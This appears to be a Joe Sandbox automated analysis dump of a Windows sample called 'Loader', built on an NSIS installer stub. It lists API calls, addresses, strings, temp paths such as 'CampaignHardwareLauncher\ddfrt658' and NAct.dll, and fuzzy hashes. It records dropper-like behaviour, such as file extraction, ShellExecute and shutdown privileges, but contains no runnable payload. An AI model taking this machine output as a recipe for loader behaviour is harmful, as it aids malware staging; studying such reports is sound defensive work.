3506->3507 3510 406cc7 3507->3510 3556 4067aa 3510->3556 3513 406ce3 DeleteFileW 3552 406eda 3513->3552 3514 406cfa 3517 406e67 3514->3517 3570 406035 lstrcpynW 3514->3570 3516 406d25 3518 406d39 3516->3518 3519 406d2f lstrcatW 3516->3519 3540 406e84 3517->3540 3517->3552 3575 406301 FindFirstFileW 3517->3575 3581 40677d lstrlenW 3518->3581 3520 406d3f 3519->3520 3524 406d4f lstrcatW 3520->3524 3526 406d57 lstrlenW FindFirstFileW 3520->3526 3524->3526 3525 4062cf 11 API calls 3525->3552 3526->3517 3553 406d7e 3526->3553 3529 405d32 CharNextW 3529->3553 3530 4062cf 11 API calls 3531 406ea5 3530->3531 3532 405e5c 2 API calls 3531->3532 3533 406ead RemoveDirectoryW 3532->3533 3537 406ef0 3533->3537 3538 406eb9 3533->3538 3534 406e44 FindNextFileW 3536 406e5c FindClose 3534->3536 3534->3553 3536->3517 3539 404f9e 25 API calls 3537->3539 3538->3540 3541 406ebf 3538->3541 3539->3552 3540->3525 3543 4062cf 11 
API calls 3541->3543 3542 4062cf 11 API calls 3542->3553 3544 406ec9 3543->3544 3547 404f9e 25 API calls 3544->3547 3545 406cc7 72 API calls 3545->3553 3549 406ed3 3547->3549 3550 406c94 42 API calls 3549->3550 3550->3552 3551 404f9e 25 API calls 3551->3534 3552->3509 3553->3529 3553->3534 3553->3542 3553->3545 3553->3551 3554 404f9e 25 API calls 3553->3554 3571 406035 lstrcpynW 3553->3571 3572 405e5c GetFileAttributesW 3553->3572 3585 406c94 3553->3585 3554->3553 3590 406035 lstrcpynW 3556->3590 3558 4067bb 3591 405d85 CharNextW CharNextW 3558->3591 3561 406064 5 API calls 3564 4067d1 3561->3564 3562 406809 lstrlenW 3563 406810 3562->3563 3562->3564 3566 40674e 3 API calls 3563->3566 3564->3562 3565 406301 2 API calls 3564->3565 3568 4067c7 3564->3568 3569 40677d 2 API calls 3564->3569 3565->3564 3567 406816 GetFileAttributesW 3566->3567 3567->3568 3568->3513 3568->3514 3569->3562 3570->3516 3571->3553 3573 405e79 DeleteFileW 3572->3573 3574 405e6b SetFileAttributesW 3572->3574 3573->3553 3574->3573 3576 406322 3575->3576 3577 406317 FindClose 3575->3577 3576->3552 3578 40674e lstrlenW CharPrevW 3576->3578 3577->3576 3579 406777 3578->3579 3580 40676b lstrcatW 3578->3580 3579->3530 3580->3579 3582 40678c 3581->3582 3583 406792 CharPrevW 3582->3583 3584 40679e 3582->3584 3583->3582 3583->3584 3584->3520 3597 406328 GetModuleHandleA 3585->3597 3589 406cbc 3589->3553 3590->3558 3592 405da2 3591->3592 3593 405db4 3591->3593 3592->3593 3595 405daf CharNextW 3592->3595 3594 405dd8 3593->3594 3596 405d32 CharNextW 3593->3596 3594->3561 3594->3568 3595->3594 3596->3593 3598 406340 LoadLibraryA 3597->3598 3599 40634b GetProcAddress 3597->3599 3598->3599 3600 406359 3598->3600 3599->3600 3600->3589 3601 406ac5 lstrcpyW 3600->3601 3602 406b13 GetShortPathNameW 3601->3602 3603 406aea 3601->3603 3604 406b2c 3602->3604 3605 406c8e 3602->3605 3627 405e7c GetFileAttributesW CreateFileW 3603->3627 3604->3605 3608 406b34 WideCharToMultiByte 3604->3608 3605->3589 3607 406af3 
CloseHandle GetShortPathNameW 3607->3605 3609 406b0b 3607->3609 3608->3605 3610 406b51 WideCharToMultiByte 3608->3610 3609->3602 3609->3605 3610->3605 3611 406b69 wsprintfA 3610->3611 3612 406831 18 API calls 3611->3612 3613 406b95 3612->3613 3628 405e7c GetFileAttributesW CreateFileW 3613->3628 3615 406ba2 3615->3605 3616 406baf GetFileSize GlobalAlloc 3615->3616 3617 406bd0 ReadFile 3616->3617 3618 406c84 CloseHandle 3616->3618 3617->3618 3619 406bea 3617->3619 3618->3605 3619->3618 3629 405de2 lstrlenA 3619->3629 3622 406c03 lstrcpyA 3625 406c25 3622->3625 3623 406c17 3624 405de2 4 API calls 3623->3624 3624->3625 3626 406c5c SetFilePointer WriteFile GlobalFree 3625->3626 3626->3618 3627->3607 3628->3615 3630 405e23 lstrlenA 3629->3630 3631 405e2b 3630->3631 3632 405dfc lstrcmpiA 3630->3632 3631->3622 3631->3623 3632->3631 3633 405e1a CharNextA 3632->3633 3633->3630 4944 4021b5 4945 40145c 18 API calls 4944->4945 4946 4021bb 4945->4946 4947 40145c 18 API calls 4946->4947 4948 4021c4 4947->4948 4949 40145c 18 API calls 4948->4949 4950 4021cd 4949->4950 4951 40145c 18 API calls 4950->4951 4952 4021d6 4951->4952 4953 404f9e 25 API calls 4952->4953 4954 4021e2 ShellExecuteW 4953->4954 4955 40221b 4954->4955 4956 40220d 4954->4956 4957 4062cf 11 API calls 4955->4957 4958 4062cf 11 API calls 4956->4958 4959 402230 4957->4959 4958->4955 4960 402238 4961 40145c 18 API calls 4960->4961 4962 40223e 4961->4962 4963 4062cf 11 API calls 4962->4963 4964 40224b 4963->4964 4965 404f9e 25 API calls 4964->4965 4966 402255 4965->4966 4967 405c6b 2 API calls 4966->4967 4968 40225b 4967->4968 4969 4062cf 11 API calls 4968->4969 4977 4022ac CloseHandle 4968->4977 4974 40226d 4969->4974 4971 4030e3 4972 402283 WaitForSingleObject 4973 402291 GetExitCodeProcess 4972->4973 4972->4974 4976 4022a3 4973->4976 4973->4977 4974->4972 4975 40635e 2 API calls 4974->4975 4974->4977 4975->4972 4979 405f7d wsprintfW 4976->4979 4977->4971 4979->4977 3666 401eb9 3667 401f24 3666->3667 3670 401ec6 
3666->3670 3668 401f53 GlobalAlloc 3667->3668 3672 401f28 3667->3672 3674 406831 18 API calls 3668->3674 3669 401ed5 3673 4062cf 11 API calls 3669->3673 3670->3669 3676 401ef7 3670->3676 3671 401f36 3690 406035 lstrcpynW 3671->3690 3672->3671 3675 4062cf 11 API calls 3672->3675 3685 401ee2 3673->3685 3678 401f46 3674->3678 3675->3671 3688 406035 lstrcpynW 3676->3688 3680 402708 3678->3680 3681 402387 GlobalFree 3678->3681 3681->3680 3682 401f06 3689 406035 lstrcpynW 3682->3689 3683 406831 18 API calls 3683->3685 3685->3680 3685->3683 3686 401f15 3691 406035 lstrcpynW 3686->3691 3688->3682 3689->3686 3690->3678 3691->3680 4980 404039 4981 404096 4980->4981 4982 404046 lstrcpynA lstrlenA 4980->4982 4982->4981 4983 404077 4982->4983 4983->4981 4984 404083 GlobalFree 4983->4984 4984->4981

Control-flow Graph (legend: Executed / Not Executed)
APIs
• #17.COMCTL32 ref: 004038CE
• SetErrorMode.KERNELBASE(00008001), ref: 004038D9
• OleInitialize.OLE32(00000000), ref: 004038E0
  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
• SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
• GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
• CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
• GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
• GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
• lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
• DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                                • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                                • String ID: /D=$ _?=$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                                • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                                • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                                • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                                • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B20B,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042B20B,759223A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                                • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                                • String ID: jF

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                                • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Control-flow Graph (image not reproduced; node 0 covers 4015a0-4015f4)
APIs
• PostQuitMessage.USER32(00000000), ref: 00401648
• Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004016B2
• SetForegroundWindow.USER32(?), ref: 004016CB
• ShowWindow.USER32(?), ref: 00401753
• ShowWindow.USER32(?), ref: 00401767
• SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
• CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
• GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
• GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
• GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658,?,000000E6,C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll,?,?,?,000000F0,?,000000F0), ref: 00401885
• MoveFileW.KERNEL32(00000000,?), ref: 00401908
• GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
• GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
• SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
Strings
• Rename on reboot: %s, xrefs: 00401943
• IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
• Rename: %s, xrefs: 004018F8
• detailprint: %s, xrefs: 00401679
• BringToFront, xrefs: 004016BD
• Jump: %d, xrefs: 00401602
• SetFileAttributes: "%s":%08X, xrefs: 0040177B
• Sleep(%d), xrefs: 0040169D
• C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll, xrefs: 00401864, 00401912, 00401936
• Aborting: "%s", xrefs: 0040161D
• C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658, xrefs: 00401878
• Rename failed: %s, xrefs: 0040194B
• IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
• CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
• Call: %d, xrefs: 0040165A
• CreateDirectory: "%s" created, xrefs: 00401849
• SetFileAttributes failed., xrefs: 004017A1
• CreateDirectory: "%s" (%d), xrefs: 004017BF
• CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Memory Dump Source
• Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Control-flow Graph (image not reproduced; node 267 covers 405958-405970)
APIs
  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
• lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
• lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
• lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
• GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                                                • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                                                • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                                • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                                                • API String ID: 608394941-2746725676

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,install,C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,install,install,00000000,00000000,install,C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B20B,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B20B,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658$C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dll$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$install
                                                                                                                                                                                                                                                                                                                • API String ID: 4286501637-3932668929

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                                • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                                • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                                • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                                • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                                                • Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                                                                                                                                                                                • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

